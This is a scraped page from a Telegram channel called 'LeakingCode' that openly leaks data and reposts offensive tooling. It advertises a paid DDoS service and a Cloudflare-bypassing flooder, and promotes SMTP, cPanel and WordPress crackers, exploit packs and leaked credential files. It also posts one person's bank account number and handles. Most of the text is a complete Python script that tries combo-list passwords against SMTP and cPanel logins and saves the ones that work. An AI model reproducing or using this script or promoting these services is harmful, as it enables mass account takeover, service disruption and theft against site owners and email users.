ar
Feedback
LeakingCode | LC On Top!

LeakingCode | LC On Top!

الذهاب إلى القناة على Telegram

On this channel we leak data. The data that was leaked included various types of data ranging from general data to prohibited data and other similar things Channel Created By @Lintar21

إظهار المزيد
1 757
المشتركون
لا توجد بيانات24 ساعات
لا توجد بيانات7 أيام
+1730 أيام
أرشيف المشاركات
Repost from Pow proxy <\3
Type-proxy : "HTTP/s" Timeout : "RAND" Free-Proxy : @udplegit Information: - 𝙰𝚕𝚒𝚟𝚎: 𝙷𝚃𝚃𝙿/𝚜=𝚄𝚗𝚔𝚗𝚘𝚠𝚗 - 𝙲𝚘𝚞𝚗𝚝: 4145 - 𝙳𝚞𝚙𝚎-𝚛𝚎𝚖𝚘𝚟𝚎: yes "JOIN OUR CH"
- @udplegit | Free proxy - @httpplain | Random db - @proxyforhire | Random tool

begitulah ceritanya di balik rest api
begitulah ceritanya di balik rest api

wkwk
wkwk

Repost from LIService Others
🔥 LI - Service ⭐️ 👍 Selling DDoS Service 🙈 Method DDoS Layer 7 • LI-TLS , FLOOD , LIX 😵 LIFETIME USAGE √ • GET ALL METHOD 😵 PER METHOD √ • COMPILED, SOURCE 🤝 PANEL DDOS √ • Lifetime, Normal 💀 DDoS SERVICE √ • 1Hour: 200K • Max 5 Hour. 👉 My Contacts @Lintar21 🥰 Channel @LIService

Kronologi : beli server dengan ram 128gb core 32 tb tb delet akun sebelum beli uda pernah aman aman aja ga tau sekarang jadi scammer staff tronc2 hati hati ygy Norek dia : 901098238690 SeaBank No tele baru dia : @kapauin Grub tele dia : https://t.me/kapauku

photo content
+4

Repost from ATLAS corporation
🚀 ATLAS HERO (v1.0) Features ± Cloudflare Turnstile Solver - Advanced debugging - User-agent options - Built-in proxy checker - Rapidreset flooder - Memory and CPU optimization - Synchronised proxy checker - 0% HTTPDDOS $ ~ npm install @ulixee/hero@latest @ulixee/hero-core@latest @ulixee/cloud@latest @ulixee/hero-plugin-utils@latest @unblocked-web/default-browser-emulator@latest colors hpack axios Made by Benshii Varga ———————————— ATLAS API corporation

Repost from ATLAS corporation
Announcement New method: HERO (browser) Will be posted TODAY This is the first method that uses the "leak of the century" lib
+1
Announcement
New method: HERO (browser) Will be posted TODAY This is the first method that uses the "leak of the century" library called Hero. Using this new library was nothing but a pain as it gets stuck on Cloudflare Turnstile loops and the documentation is extremely confusing and limited. Unfortunately, The Hero library only supports Chrome 121 or lower. An updated version of this script is unlikely if the library doesn't support more recent chrome versions. More scripts will be posted soon as the channel continues to grow! 😄 Made by Benshii ——————————————— ATLAS API corporation

Repost from ZEXPLOIT #comeback
🔖 all in one [Cracker] 🤴 - Crack SMTPs - Crack Webmails - Crack Cpanels - Crack Whm - Crack Wordpress [DOWNLAOD]
🔖 all in one [Cracker] 🤴 - Crack SMTPs - Crack Webmails - Crack Cpanels - Crack Whm - Crack Wordpress [DOWNLAOD]

Repost from ZEXPLOIT #comeback
+1
[+] PROXY TYPE : HQ SOCKS4 [+] COUNTRY : MIXED [+] TOTAL PROXY : 2899 [+] Daily HQ Proxy Bot

Cpanels (6).txt1.70 MB

Repost from ZEXPLOIT #comeback
fix, new update server login

Repost from ZEXPLOIT #comeback
Wordpress Exploit.. Open Source Enjoy

Repost from ZEXPLOIT #comeback
Ddos with Telegram Bot Source code FREE

Repost from ZEXPLOIT #comeback
WordPress Exploit(60+) Joomla Exploit(20+) Other Filemanager Exploit (500+) WordPress & Joomla & Other(660+) You need - python version 3 - requests module (pip3 install requests) - colorama (pip3 install colorama) - urllist Start : python3 0day-Mari-Source.py URLs.txt

Repost from ZEXPLOIT #comeback
0day-Mari-Source.py3.79 KB

Repost from ZEXPLOIT #comeback
Cpanel Bruter force tools import sys, requests, re, smtplib, os, time from multiprocessing.dummy import Pool from colorama import Fore from colorama import init init(autoreset=True) fr = Fore.RED fc = Fore.CYAN fw = Fore.WHITE fg = Fore.GREEN fm = Fore.MAGENTA fy = Fore.YELLOW fb = Fore.BLUE requests.urllib3.disable_warnings() def log() : log = """ {}[#]{} Create By :: {} ___ ______ {} / _ \ | ___| {}/ /_\ \_ __ ___ _ __ _ _ _ __ ___ ___ _ _ ___ | |_ _____ __ {}| _ | '_ \ / _ \| '_ \| | | | '_ ` _ \ / _ \| | | / __|| _/ _ \ \/ / {}| | | | | | | (_) | | | | |_| | | | | | | (_) | |_| \__ \| || (_) > < {}\_| |_/_| |_|\___/|_| |_|\__, |_| |_| |_|\___/ \__,_|___/\_| \___/_/\_\ {} __/ | {} |___/ {}Crack cPanel/SMTP {}v1 """.format(fr, fw, fg, fr, fg, fr, fg, fr, fg, fr, fw, fg) for line in log.split("\n"): print(line) time.sleep(0.15) def input_Fox(txt): try : if (sys.version_info[0] < 3): return raw_input(txt).strip() else : sys.stdout.write(txt) return input() except: return False def URLdomain_Fox(site): if (site.startswith("http://")) : site = site.replace("http://", "") elif (site.startswith("https://")) : site = site.replace("https://", "") if ('www.' in site) : site = site.replace("www.", "") if ('/' in site): site = site.rstrip() site = site.split('/')[0] return site def SMTP_Fox(c): try : c = c.split(':') email = c[0] pwd = c[1] host = URLdomain_Fox(email.split('@')[1]) ports = ['587', '25', '465'] for port in ports : try : if (port == '465'): server = smtplib.SMTP_SSL(host, port) else : server = smtplib.SMTP(host, port) server.starttls() server.login(email, pwd) smtp = '{}|{}|{}|{}'.format(host, port, email, pwd) open('SMTPs.txt', 'a').write(smtp + '\n') print (' -| {}{} [SMTP]'.format(fg, smtp)) break except : pass except : pass def CpanelChecker_Fox(c): try: c = c.split(':') email = c[0] pwd = c[1] domain = URLdomain_Fox(email.split('@')[1]) user1 = domain.split('.')[0] user2 = domain.replace(".","") users = [user1, user2] if (len(user1) > 8): user3 = user1[:8] users.append(user3) for user in users : try : postlogin = {'user': user, 'pass': pwd, 'login_submit': 'Log in', 'goto_uri': '/'} login = requests.post('https://{}:2083/login/'.format(domain), verify=False, data=postlogin, timeout=15).content if ('filemanager' in login): cp = 'https://{}:2083|{}|{}'.format(domain, user, pwd) open('cPanels.txt', 'a').write(cp + '\n') print (' -| {}{} [cPanel]'.format(fg, cp)) break except : break except : pass def exploit(c): try : c = c.strip() print (' -| ' + c) SMTP_Fox(c) CpanelChecker_Fox(c) except: pass def run(): log() try: target = open(sys.argv[1], 'r') except: yList = str(input_Fox('\n Your Combo-List --> : ')) if (not os.path.isfile(yList)): print("\n {}({}) File does not exist!\n".format(fr, yList)) sys.exit(0) target = open(yList, 'r') mp = Pool(150) mp.map(exploit, target) mp.close() mp.join() run() Python3 use

Repost from ZEXPLOIT #comeback
+1
maill-access.txt4.14 KB